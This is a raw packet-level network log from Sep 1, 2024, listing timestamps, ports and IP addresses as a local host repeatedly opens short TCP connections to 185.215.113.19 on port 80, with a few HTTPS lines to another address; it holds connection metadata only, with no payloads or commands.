Sep 1, 2024 06:29:35.920707941 CEST	80	49841	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:35.920913935 CEST	49841	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:35.921111107 CEST	49841	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:35.921255112 CEST	80	49840	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:35.921308041 CEST	49840	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:35.926027060 CEST	80	49841	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:36.698991060 CEST	80	49841	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:36.699083090 CEST	49841	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:36.812053919 CEST	49841	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:36.812381029 CEST	49842	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:36.817430973 CEST	80	49841	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:36.817559958 CEST	49841	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:36.817740917 CEST	80	49842	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:36.817800999 CEST	49842	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:36.818028927 CEST	49842	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:36.823086023 CEST	80	49842	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:37.605518103 CEST	80	49842	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:37.605690002 CEST	49842	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:37.609411955 CEST	49842	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:37.609716892 CEST	49843	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:37.616827011 CEST	80	49843	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:37.616909981 CEST	49843	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:37.617441893 CEST	49843	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:37.619060040 CEST	80	49842	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:37.619112968 CEST	49842	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:37.621994019 CEST	49843	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:37.625505924 CEST	80	49843	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:37.625550032 CEST	49843	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:37.739223003 CEST	49844	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:37.946914911 CEST	80	49844	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:37.946989059 CEST	49844	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:37.947256088 CEST	49844	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:37.952568054 CEST	80	49844	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:38.716128111 CEST	80	49844	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:38.718293905 CEST	49844	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:38.722830057 CEST	49844	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:38.723196030 CEST	49845	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:38.728147984 CEST	80	49844	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:38.728245974 CEST	49844	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:38.728283882 CEST	80	49845	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:38.728615999 CEST	49845	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:38.728828907 CEST	49845	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:38.733962059 CEST	80	49845	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:39.476171970 CEST	80	49845	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:39.476227045 CEST	49845	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:39.592181921 CEST	49845	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:39.592356920 CEST	49846	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:39.598748922 CEST	80	49846	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:39.599396944 CEST	80	49845	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:39.599478006 CEST	49845	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:39.599703074 CEST	49846	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:39.599703074 CEST	49846	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:39.607049942 CEST	80	49846	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:40.346975088 CEST	80	49846	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:40.350720882 CEST	49846	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:40.353051901 CEST	49846	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:40.353401899 CEST	49847	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:40.358352900 CEST	80	49846	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:40.358614922 CEST	80	49847	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:40.358670950 CEST	49846	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:40.358706951 CEST	49847	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:40.358844995 CEST	49847	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:40.363995075 CEST	80	49847	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:41.123135090 CEST	80	49847	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:41.124732018 CEST	49847	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:41.389040947 CEST	49847	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:41.389309883 CEST	49848	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:41.394315958 CEST	80	49848	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:41.394856930 CEST	80	49847	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:41.394927025 CEST	49847	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:41.395239115 CEST	49848	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:41.395239115 CEST	49848	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:41.400331020 CEST	80	49848	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:42.137677908 CEST	80	49848	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:42.137773991 CEST	49848	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:42.141496897 CEST	49848	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:42.141778946 CEST	49849	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:42.147094965 CEST	80	49849	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:42.147180080 CEST	49849	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:42.147262096 CEST	80	49848	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:42.147325993 CEST	49849	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:42.147346973 CEST	49848	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:42.152427912 CEST	80	49849	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:42.893543959 CEST	80	49849	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:42.893614054 CEST	49849	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:42.998778105 CEST	49849	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:42.999066114 CEST	49850	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:43.004273891 CEST	80	49849	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:43.004327059 CEST	49849	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:43.004343987 CEST	80	49850	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:43.004600048 CEST	49850	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:43.004832029 CEST	49850	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:43.009818077 CEST	80	49850	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:43.779803038 CEST	80	49850	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:43.779897928 CEST	49850	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:43.783327103 CEST	49850	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:43.783626080 CEST	49851	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:43.788914919 CEST	80	49850	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:43.788929939 CEST	80	49851	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:43.788974047 CEST	49850	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:43.789004087 CEST	49851	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:43.789258003 CEST	49851	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:43.794244051 CEST	80	49851	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:44.556024075 CEST	80	49851	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:44.556090117 CEST	49851	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:44.682706118 CEST	49851	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:44.683022976 CEST	49852	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:44.688239098 CEST	80	49851	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:44.688255072 CEST	80	49852	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:44.688287020 CEST	49851	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:44.688325882 CEST	49852	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:44.688565016 CEST	49852	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:44.693896055 CEST	80	49852	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:45.430222988 CEST	80	49852	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:45.430413008 CEST	49852	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:45.432780027 CEST	49852	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:45.433166027 CEST	49853	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:45.439243078 CEST	80	49852	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:45.439347029 CEST	49852	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:45.439451933 CEST	80	49853	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:45.439594984 CEST	49853	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:45.439825058 CEST	49853	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:45.445215940 CEST	80	49853	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:46.184551954 CEST	80	49853	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:46.184611082 CEST	49853	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:46.351712942 CEST	49853	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:46.352261066 CEST	49854	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:46.356947899 CEST	80	49853	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:46.357002974 CEST	49853	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:46.357290030 CEST	80	49854	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:46.357348919 CEST	49854	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:46.362407923 CEST	49854	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:46.367249012 CEST	80	49854	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:47.101752996 CEST	80	49854	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:47.101852894 CEST	49854	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:47.104731083 CEST	49854	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:47.104737997 CEST	49855	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:47.110802889 CEST	80	49855	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:47.110915899 CEST	49855	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:47.111188889 CEST	80	49854	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:47.111217976 CEST	49855	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:47.111303091 CEST	49854	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:47.116390944 CEST	80	49855	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:47.854269981 CEST	80	49855	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:47.854326010 CEST	49855	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:47.969979048 CEST	49855	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:47.970357895 CEST	49856	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:47.975445032 CEST	80	49856	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:47.975502014 CEST	49856	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:47.975831985 CEST	49856	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:47.975974083 CEST	80	49855	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:47.976020098 CEST	49855	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:47.981043100 CEST	80	49856	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:48.746891022 CEST	80	49856	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:48.747035027 CEST	49856	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:48.749476910 CEST	49856	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:48.749768972 CEST	49857	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:48.754852057 CEST	80	49856	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:48.754873037 CEST	80	49857	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:48.754937887 CEST	49856	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:48.754964113 CEST	49857	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:48.755177975 CEST	49857	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:48.760039091 CEST	80	49857	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:49.560703039 CEST	80	49857	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:49.561294079 CEST	49857	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:49.671242952 CEST	49857	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:49.672961950 CEST	49858	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:49.677684069 CEST	80	49857	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:49.677896976 CEST	49857	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:49.678175926 CEST	80	49858	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:49.680881023 CEST	49858	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:49.681036949 CEST	49858	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:49.687773943 CEST	80	49858	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:50.448950052 CEST	80	49858	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:50.449011087 CEST	49858	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:50.451189041 CEST	49858	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:50.451452971 CEST	49859	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:50.456986904 CEST	80	49858	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:50.457045078 CEST	49858	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:50.457355022 CEST	80	49859	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:50.457418919 CEST	49859	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:50.457571030 CEST	49859	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:50.462505102 CEST	80	49859	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:51.201062918 CEST	80	49859	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:51.201263905 CEST	49859	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:51.310579062 CEST	49859	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:51.312810898 CEST	49860	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:51.321923971 CEST	80	49859	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:51.323556900 CEST	80	49860	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:51.323666096 CEST	49859	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:51.323669910 CEST	49860	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:51.323873043 CEST	49860	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:51.335149050 CEST	80	49860	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:52.075524092 CEST	80	49860	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:52.075588942 CEST	49860	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:52.079363108 CEST	49860	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:52.079722881 CEST	49861	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:52.085973978 CEST	80	49861	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:52.086028099 CEST	49861	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:52.086102962 CEST	80	49860	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:52.086150885 CEST	49860	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:52.086292982 CEST	49861	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:52.091819048 CEST	80	49861	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:52.832056999 CEST	80	49861	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:52.838716984 CEST	49861	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:52.954720974 CEST	49862	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:52.954721928 CEST	49861	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:52.960012913 CEST	80	49862	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:52.960202932 CEST	80	49861	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:52.960230112 CEST	49862	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:52.960411072 CEST	49862	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:52.960429907 CEST	49861	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:52.965241909 CEST	80	49862	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:53.700422049 CEST	80	49862	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:53.706722975 CEST	49862	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:53.709984064 CEST	49862	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:53.709990025 CEST	49863	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:53.715189934 CEST	80	49862	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:53.715640068 CEST	80	49863	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:53.718846083 CEST	49862	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:53.718849897 CEST	49863	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:53.719053984 CEST	49863	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:53.724555969 CEST	80	49863	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:54.362178087 CEST	49763	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:29:54.362199068 CEST	443	49763	142.250.65.238	192.168.2.5
Sep 1, 2024 06:29:54.362234116 CEST	49764	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:29:54.362247944 CEST	443	49764	142.250.65.238	192.168.2.5
Sep 1, 2024 06:29:54.486517906 CEST	80	49863	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:54.486568928 CEST	49863	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:54.595582962 CEST	49863	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:54.596086025 CEST	49864	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:54.600980043 CEST	80	49863	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:54.600997925 CEST	80	49864	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:54.601031065 CEST	49863	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:54.601069927 CEST	49864	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:54.601501942 CEST	49864	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:54.606331110 CEST	80	49864	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:55.345346928 CEST	80	49864	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:55.345468044 CEST	49864	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:55.348352909 CEST	49865	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:55.348361015 CEST	49864	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:55.353277922 CEST	80	49865	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:55.353820086 CEST	80	49864	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:55.356966019 CEST	49865	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:55.356973886 CEST	49864	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:55.360733032 CEST	49865	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:55.365694046 CEST	80	49865	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:56.126555920 CEST	80	49865	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:56.126605034 CEST	49865	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:56.252966881 CEST	49865	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:56.253257990 CEST	49866	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:56.258444071 CEST	80	49865	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:56.258501053 CEST	49865	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:56.258651018 CEST	80	49866	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:56.258709908 CEST	49866	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:56.258936882 CEST	49866	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:56.264225006 CEST	80	49866	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:57.004051924 CEST	80	49866	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:57.004131079 CEST	49866	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:57.007781982 CEST	49866	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:57.010762930 CEST	49867	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:57.014384031 CEST	80	49866	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:57.014506102 CEST	49866	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:57.015966892 CEST	80	49867	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:57.016309977 CEST	49867	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:57.016542912 CEST	49867	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:57.021750927 CEST	80	49867	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:57.789015055 CEST	80	49867	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:57.789067984 CEST	49867	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:57.907411098 CEST	49867	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:57.907756090 CEST	49868	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:57.912641048 CEST	80	49867	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:57.912703991 CEST	49867	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:57.913013935 CEST	80	49868	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:57.913074017 CEST	49868	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:57.913204908 CEST	49868	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:57.918199062 CEST	80	49868	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:58.672049046 CEST	80	49868	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:58.672120094 CEST	49868	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:58.674267054 CEST	49868	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:58.674532890 CEST	49869	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:58.680291891 CEST	80	49869	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:58.680361032 CEST	49869	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:58.680550098 CEST	49869	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:58.680599928 CEST	80	49868	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:58.680649042 CEST	49868	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:58.685898066 CEST	80	49869	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:59.452893019 CEST	80	49869	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:59.452986956 CEST	49869	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:59.564717054 CEST	49869	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:59.564717054 CEST	49870	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:59.570242882 CEST	80	49870	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:59.571482897 CEST	80	49869	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:59.571578026 CEST	49869	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:59.571655035 CEST	49870	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:59.571737051 CEST	49870	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:59.576617956 CEST	80	49870	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:00.346474886 CEST	80	49870	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:00.346524954 CEST	49870	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:00.349826097 CEST	49870	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:00.350187063 CEST	49871	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:00.354974031 CEST	80	49870	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:00.355020046 CEST	49870	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:00.355369091 CEST	80	49871	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:00.355431080 CEST	49871	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:00.355526924 CEST	49871	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:00.360862970 CEST	80	49871	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:01.131984949 CEST	80	49871	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:01.134807110 CEST	49871	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:01.250725985 CEST	49872	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:01.250725985 CEST	49871	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:01.255768061 CEST	80	49872	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:01.255916119 CEST	80	49871	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:01.255944967 CEST	49872	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:01.256078005 CEST	49871	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:01.256181002 CEST	49872	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:01.261450052 CEST	80	49872	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:01.999320030 CEST	80	49872	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:01.999377966 CEST	49872	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:02.002931118 CEST	49872	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:02.003216982 CEST	49873	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:02.007968903 CEST	80	49872	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:02.008021116 CEST	49872	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:02.008497953 CEST	80	49873	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:02.008559942 CEST	49873	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:02.008835077 CEST	49873	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:02.013725042 CEST	80	49873	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:03.043190956 CEST	80	49873	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:03.043344021 CEST	49873	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:03.045424938 CEST	80	49873	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:03.045650005 CEST	49873	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:03.156904936 CEST	49873	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:03.156904936 CEST	49874	80	192.168.2.5	185.215.113.19
